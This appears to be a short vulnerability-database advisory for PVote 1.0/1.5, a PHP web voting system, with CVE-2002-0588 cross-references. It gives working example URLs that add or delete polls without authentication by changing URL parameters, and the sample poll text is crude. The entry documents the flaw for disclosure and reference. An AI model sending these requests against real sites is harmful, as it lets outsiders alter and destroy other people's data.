source: http://www.securityfocus.com/bid/4540/info PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems. It is possible for a remote attacker to add/delete web polls just by manipulating the values of URL parameters. ADD A POLL: http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4 =bad where question refers to the topic of the topic to be added by the attack. DELETE A POLL: http://target/pvote/del.php?pollorder=1 where pollorder is the poll 'id' number for the poll to be deleted.
Related ExploitsTrying to match CVEs (1): CVE-2002-0588
Trying to match OSVDBs (1): 14423
Other Possible E-DB Search Terms: PVote 1.0/1.5, PVote
|2002-04-18||21397||PVote 1.0/1.5 - Unauthorized Administrative Password Change||Daniel NystrÃ¶m|